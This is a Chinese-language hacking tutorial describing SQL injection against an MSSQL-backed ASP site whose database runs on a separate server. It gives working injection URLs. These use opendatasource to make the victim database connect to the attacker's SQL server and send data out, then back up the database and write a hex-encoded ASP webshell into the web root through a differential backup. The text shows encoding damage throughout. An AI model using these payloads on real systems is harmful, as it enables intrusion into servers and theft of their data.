.現(xiàn)在注入橫飛！工具一大堆，過(guò)去手工注入的時(shí)代已經(jīng)不復(fù)存在！代之的是NBSI HDSI 啊D注入工具..等等.也是廣大菜鳥(niǎo)的最愛(ài)了.即使什么也不會(huì).什么也不懂.只需要點(diǎn)幾下鼠標(biāo).存在注入漏洞的網(wǎng)站密碼就出來(lái)了.接下來(lái)就是掃掃后臺(tái).傳傳馬.就完了.就這樣簡(jiǎn)單.碰到SA權(quán)限的話就.直接建立號(hào)開(kāi)3389或者上傳WEBSHELL.是內(nèi)網(wǎng)就映射.是DB_OWNER權(quán)限的話呢就考慮用備份差異.但是WEB和數(shù)據(jù)庫(kù)不在同一臺(tái)服務(wù)器該怎么搞呢？其實(shí)也不一定是搞不定.除了往注冊(cè)表啟動(dòng)鍵值寫DOS命令，讓目標(biāo)服務(wù)器下會(huì)開(kāi)機(jī)執(zhí)行，不過(guò)也是有局限性的.該用戶必須授權(quán)于Master這個(gè)庫(kù).才可調(diào)用儲(chǔ)存過(guò)程.很少有管理員會(huì)這樣做.所以希望很渺小.如果我們遇到這種情況的話該如何搞呢？看圖1

DB權(quán)限.列下目錄看看數(shù)據(jù)是否跟WEB在一塊.要是在一塊可考慮備份差異.不過(guò)很可惜.找來(lái)找去都沒(méi)有找到WEB目錄.如圖2

javascript:resizepic(this) border=0>

這是利用MSSQL的XP_dirtree儲(chǔ)存過(guò)程讀取路徑.然后寫入臨時(shí)表的結(jié)果.以前的NBSI沒(méi)這功能.小菜門只好掃掃SA啊。弄弄后臺(tái)之類的.后來(lái)NBSI增加了treelist的功能.可列出目錄，更為方便查看目錄結(jié)構(gòu).軟件信息等等.后來(lái)臭要飯的開(kāi)發(fā)了Getwebshell才使這功能畢生光芒,把馬插到數(shù)據(jù)庫(kù)里，然后把數(shù)據(jù)庫(kù)備份為ASP文件.行是可行.但是數(shù)據(jù)庫(kù)要是過(guò)大的話.幾十M的WEBSHELL你說(shuō)能用嗎？Xiaolu的備份差異還算不錯(cuò)了.減少文件大小.進(jìn)行差異備份.不過(guò)還是回到原來(lái)一點(diǎn).數(shù)據(jù)和WEB不在一塊......

  其實(shí).即使數(shù)據(jù)庫(kù)和WEB不在一塊還是有機(jī)會(huì)搞的.并不是說(shuō)一點(diǎn)機(jī)會(huì)沒(méi).一般服務(wù)器裝好系統(tǒng)什么的.都會(huì)裝個(gè)IIS吧？列他C盤.看看有沒(méi)有Inetpub這個(gè)目錄.就知道他有沒(méi)有裝IIS了.但是.不知道他IP也？怎么辦呢？可以這樣來(lái)，PING一下WEB服務(wù)器.掃他這一C段的1433端口.看看哪臺(tái)開(kāi)了.不過(guò)這方法也不好.現(xiàn)在很多主機(jī)都啟用了防火墻.1433端口就算開(kāi)了你也掃不著.這該怎么辦呢？可以利用opendatasource宏讓對(duì)方的SQL與自己的數(shù)據(jù)庫(kù)建立連接.既然能建立連接.就可以得到數(shù)據(jù)庫(kù)服務(wù)器的IP地址了.我們來(lái)試試看.有幾個(gè)前提得說(shuō)一下.第一.你機(jī)器必須要有公網(wǎng)IP.而且開(kāi)放的1433端口要保證能被外網(wǎng)訪問(wèn)到.好.條件滿足.就開(kāi)始做吧！

我現(xiàn)在搞的這站.100%數(shù)據(jù)和WEB不在一塊.但是從C盤看到了Inetpub文件夾.說(shuō)明這數(shù)據(jù)庫(kù)服務(wù)器安裝了IIS.但是得不到他IP呀.怎么搞哦.簡(jiǎn)單.就用上面所說(shuō)的方法搞一下.先在本機(jī)建個(gè)庫(kù)先.打開(kāi)查詢分析器輸入
create database hack520 CREATE TABLE zhu(name nvarchar(256) null);CREATE TABLE J8(id int NULL,name nvarchar(256) null); 點(diǎn)執(zhí)行.如圖4

javascript:resizepic(this) border=0>

建立了一個(gè)hack520的庫(kù)名.和zhu  J8兩個(gè)表.zhu里面有name這一個(gè)字段.J8也放了兩字段名.一個(gè)是id一個(gè)是name.好了.現(xiàn)在就可以開(kāi)始建立連接了~~~~~~~先看一下這條SQL語(yǔ)句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用戶;pwd=SQL密碼;database=建立的庫(kù)名') .庫(kù)名.表名 '執(zhí)行的語(yǔ)句'  恩現(xiàn)在開(kāi)始吧...

http://www.xxx.com/news.asp?id=126'insert%20into%20opendatasource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--

在IE上執(zhí)行咯.呵呵這個(gè)時(shí)候?qū)Ψ骄蜁?huì)連接到我機(jī)器的SQL服務(wù)器.不信？netstat -an看一下~圖5

javascript:resizepic(this) border=0>

哈哈已經(jīng)連過(guò)來(lái)了.現(xiàn)在數(shù)據(jù)庫(kù)服務(wù)器IP知道了.而且數(shù)據(jù)庫(kù)服務(wù)器又開(kāi)了80.現(xiàn)在干什么呢？bak一個(gè)webshell上去吧.已知WEB目錄C:\Inetpub\wwwroot.好.開(kāi)始
http://www.xxx.com/news.asp?id=126;use tg800;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x737339323238 backup database @a to disk=@s-- 備份當(dāng)前庫(kù)

http://www.xxx.com/news.asp?id=126;Drop table [hack520];create table [dbo].[hack520] ([cmd] [image])--  建表

http://www.xxx.com/news.asp?id=126;insert into hack520(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--  插入藍(lán)屏木馬

http://www.xxx.com/news.asp?id=126;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x433A5C496E65747075625C777777726F6F745C7A68752E617370  backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 再次以差異備份得到WEBSHELL http://221.216xxx.xx/zhu.asp

接下來(lái)就是用藍(lán)屏木馬客戶端連接咯.這個(gè)就簡(jiǎn)單了.我這里就不多說(shuō)了.雖然沒(méi)有拿到WEB服務(wù)器的SHELL.但是至少也不是空手而歸.拿到了數(shù)據(jù)庫(kù)服務(wù)器的SHELL.就到這里.88

最新評(píng)論